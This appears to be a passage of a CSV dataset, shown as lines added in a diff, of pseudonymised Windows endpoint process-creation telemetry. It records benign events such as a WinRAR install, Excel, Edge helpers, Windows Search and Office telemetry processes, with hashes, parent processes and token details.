+748,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:05:36.610690300+00:00,3256,winrar-x64-602.exe,"""winrar-x64-602.exe"" ",PortableExecutable,2021-06-23 03:04:42.400906800+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Downloads\winrar-x64-602.exe,3338648,fc61fdcad5a9d52a01bd2d596f2c92b9,9e6f6adcbc67cfa9854ecc31684dd6b9f7210374c2b98b62380ceb17b49f64bc,77ab1e20c685e716b82c7c90b373316fc84cde23,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,domainpii_6c8dcea42fcdd51d2421333a881b2b98b372fa53,userpii_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.951048300+00:00,11452,explorer.exe,Explorer.EXE,False,2021-06-23 00:51:19.663301200+00:00,18268,userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:05:36.629394400+00:00,2021-06-23 03:07:42.495211400+00:00,44c3bcc7-546b-4ca9-881e-989d0603bfdf,computerpii_0a470890c60768167990033d701e7bd881398861,160630,False,10.7740.19041.1052,False,11540474045171770,,11540474045172958,2021-06-23 00:51:19.951048300+00:00,11452,2021-06-10 00:47:25.157136200+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,3388,128,Missing,c:\windows\explorer.exe,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-23 00:51:19.952611900+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,1.0,20481.0,1.0,1025.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Alexander Roshal,WinRAR,6.2.0,WinRAR,WinRAR.exe,WinRAR archiver
+749,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:05:38.853852800+00:00,16224,Uninstall.exe,"""uninstall.exe"" /setup",PortableExecutable,2021-06-23 03:05:38.646367600+00:00,C:\Program Files\WinRAR\Uninstall.exe,412312,801d45c1ba40d3f49870e4d9bd319869,a99ed97a67233e0677468b0ea076e3c8182299e75c09cebf83e2564415483c76,5594c3f86e81f44ed1abc0389fb3c9e686c85336,fc61fdcad5a9d52a01bd2d596f2c92b9,9e6f6adcbc67cfa9854ecc31684dd6b9f7210374c2b98b62380ceb17b49f64bc,77ab1e20c685e716b82c7c90b373316fc84cde23,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:05:36.610690300+00:00,3256,winrar-x64-602.exe,"""winrar-x64-602.exe"" ",True,2021-06-10 00:47:25.157136200+00:00,3388,\Device\HarddiskVolume3\Windows\System32\svchost.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:05:39.103185900+00:00,2021-06-23 03:07:42.496441900+00:00,e82d66c4-21fc-4005-bf16-d27b2957a0bc,computerpii_0a470890c60768167990033d701e7bd881398861,160654,False,10.7740.19041.1052,False,11540474045172958,,11540474045172959,2021-06-23 03:05:36.610690300+00:00,3256,2021-06-23 03:05:36.610690300+00:00,winrar-x64-602.exe,3256,256,TerminateProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Downloads,3338648,2021-06-11 09:17:04+00:00,2021-06-23 03:04:58.851396100+00:00,2021-06-23 03:05:33.712742600+00:00,2021-06-23 03:04:42.400906800+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,1.0,1025.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Alexander Roshal,WinRAR,6.2.0,WinRAR,WinRAR.exe,WinRAR archiver,Alexander Roshal,WinRAR,6.2.0,Uninstall WinRAR,Uninstall.exe,Uninstall WinRAR
+750,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:05:46.299532100+00:00,9116,WinRAR.exe,"""WinRAR.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Downloads\FilePII_46f5850694e4c376b5108164be1f70ca78fce205.rar""",PortableExecutable,2021-06-23 03:05:38.655932+00:00,C:\Program Files\WinRAR\WinRAR.exe,2637464,d9e5fc5762493ad57fe354558b0a21b5,e602e65ce7bde0e923af34f8439c0373e585abbb462ac3d07068b225880e6fbd,d10cf48e6453705ed69d6c755cb77f17033bd3da,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.951048300+00:00,11452,explorer.exe,Explorer.EXE,False,2021-06-23 00:51:19.663301200+00:00,18268,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:05:46.345934800+00:00,2021-06-23 03:07:42.501849+00:00,883cc9c6-d5df-4407-bc4e-259a72178a92,computerpii_0a470890c60768167990033d701e7bd881398861,160769,False,10.7740.19041.1052,False,11540474045171770,,11540474045172961,2021-06-23 00:51:19.951048300+00:00,11452,2021-06-23 00:51:19.951048300+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,11452,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-23 00:51:19.952611900+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,20481.0,1.0,1025.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Alexander Roshal,WinRAR,6.2.0,WinRAR,WinRAR.exe,WinRAR archiver
+751,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 03:06:13.956276100+00:00,6236,CompatTelRunner.exe,compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW,PortableExecutable,2021-04-14 01:10:17.849732200+00:00,C:\Windows\System32\CompatTelRunner.exe,160072,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:47:25.357121200+00:00,5516,svchost.exe,svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:06:14.235647600+00:00,2021-06-23 03:07:42.502508300+00:00,5ccbaf60-8c62-4ff0-873a-e6f72940c2a6,computerpii_0a470890c60768167990033d701e7bd881398861,160782,False,10.7740.19041.1052,False,11540474045137070,,11540474045172963,2021-06-10 00:47:25.357121200+00:00,5516,2021-06-10 00:47:25.357121200+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,5516,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:47:25.703081300+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry
+752,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 03:06:13.964589500+00:00,16420,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 03:06:13.956276100+00:00,6236,CompatTelRunner.exe,compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW,True,2021-06-10 00:47:25.357121200+00:00,5516,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:06:14.235905600+00:00,2021-06-23 03:07:42.502585200+00:00,6a5a882b-c7e1-4bdd-a2b1-df0d385cce6e,computerpii_0a470890c60768167990033d701e7bd881398861,160783,False,10.7740.19041.1052,False,11540474045172963,,11540474045172964,2021-06-23 03:06:13.956276100+00:00,6236,2021-06-23 03:06:13.956276100+00:00,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,6236,128,ActiveProcessStartkey,C:\Windows\System32,160072,2038-11-30 03:05:59+00:00,2021-04-14 01:10:17.855025900+00:00,2021-06-23 03:06:13.968242500+00:00,2021-04-14 01:10:17.849732200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+753,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:06:48.818164700+00:00,1460,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10840 /prefetch:8",PortableExecutable,2021-06-18 23:49:38.664048500+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.54\identity_helper.exe,1080720,33098278b86f6e967f5e0f66da8192fa,dbe0ea072c1e26f07ae34f6b721074635048644ef14fce622e4097f05b6684c2,c345ea4721c3bafc8f7592f97f0407541b464904,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:06:48.995313+00:00,2021-06-23 03:07:42.503054800+00:00,dbde0b05-e86f-4f06-9a8f-168b3acc1418,computerpii_0a470890c60768167990033d701e7bd881398861,160792,False,10.7740.19041.1052,False,11540474045171833,,11540474045172965,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.54,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+754,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:04:24.591423400+00:00,17372,taskhostw.exe,taskhostw.exe Logon,PortableExecutable,2021-04-14 01:10:22.932389100+00:00,C:\Windows\System32\taskhostw.exe,97096,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:04:24.627301800+00:00,2021-06-24 11:05:15.395195400+00:00,5134f361-0eaf-4481-8f23-3b8c63db5564,computerpii_0a470890c60768167990033d701e7bd881398861,179995,False,10.7740.19041.1052,False,11540474045136925,,11540474045177967,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,16512,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,465521635,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks
+755,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:20:15.351208600+00:00,12472,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe631_ Global\UsGthrCtrlFltPipeMssGthrPipe631 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:20:15.374768700+00:00,2021-06-23 01:21:45.315289200+00:00,351770c2-b0e7-4680-9481-83dc4961721f,computerpii_0a470890c60768167990033d701e7bd881398861,157693,False,10.7740.19041.1052,False,11540474045144190,,11540474045172332,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+756,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:20:15.105085100+00:00,9120,EXCEL.EXE,"""EXCEL.EXE""  /Embedding",PortableExecutable,2021-06-12 08:57:18.794658+00:00,C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE,64015672,66d31deb154ba9b5df423b98cee537ba,e342bb0be7f5d38f8828968705ccea54ebd706a032bd50237ac4a5738638563c,2f5743f797563878746502bec5ecd37c69bab818,66d31deb154ba9b5df423b98cee537ba,e342bb0be7f5d38f8828968705ccea54ebd706a032bd50237ac4a5738638563c,2f5743f797563878746502bec5ecd37c69bab818,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:20:13.473598900+00:00,16848,EXCEL.EXE,"""EXCEL.EXE"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Desktop\Truecoin KYC\GEA collection\FilePII_745f8bd00491193795547f96e223eb8b271405bb.xlsx""",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:20:15.899197100+00:00,2021-06-23 01:21:45.315429400+00:00,c540e57b-9c19-42ca-bc52-b31e3bcacbbd,computerpii_0a470890c60768167990033d701e7bd881398861,157696,False,10.7740.19041.1052,False,11540474045172326,,11540474045172330,2021-06-23 01:20:13.473598900+00:00,16848,2021-06-23 01:20:13.473598900+00:00,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\EXCEL.EXE,16848,128,ActiveProcessStartkey,C:\Program Files\Microsoft Office\root\Office16,64015672,2021-06-03 12:57:23+00:00,2021-06-12 08:57:18.880777600+00:00,2021-06-23 01:20:14.443028600+00:00,2021-06-12 08:57:18.794658+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1025.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Office,16.0.13801.20738,Excel,Excel.exe,Microsoft Excel,Microsoft Corporation,Microsoft Office,16.0.13801.20738,Excel,Excel.exe,Microsoft Excel
+757,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:20:17.034052600+00:00,3048,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320632_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320632 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:20:17.479655+00:00,2021-06-23 01:21:45.316015800+00:00,f1130ed0-bec1-4c9d-a864-c040ca397fe7,computerpii_0a470890c60768167990033d701e7bd881398861,157709,False,10.7740.19041.1052,False,11540474045144190,,11540474045172335,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+758,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:21:19.938062900+00:00,15928,msoia.exe,"""msoia.exe"" scan upload mininterval:2880",PortableExecutable,2021-05-17 00:47:47.018542700+00:00,C:\Program Files\Microsoft Office\root\Office16\msoia.exe,5260200,1c5600cf684054412e3c22caf8992864,c86a878eb2113e7c3d470a42b0b829b3abfb1b7cbc50499e9d00709097470eaa,de354752cd9eb2705342b7e75d06d6a18e034add,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:21:20.055518600+00:00,2021-06-23 01:21:45.326428300+00:00,2b1ad9d6-918f-4deb-96da-a3287421b2e3,computerpii_0a470890c60768167990033d701e7bd881398861,157817,False,10.7740.19041.1052,False,11540474045136925,,11540474045172353,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,16512,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft Office,16.0.13801.20634,msoia,msoia.exe,Office Telemetry Dashboard Agent (OTD msoia)
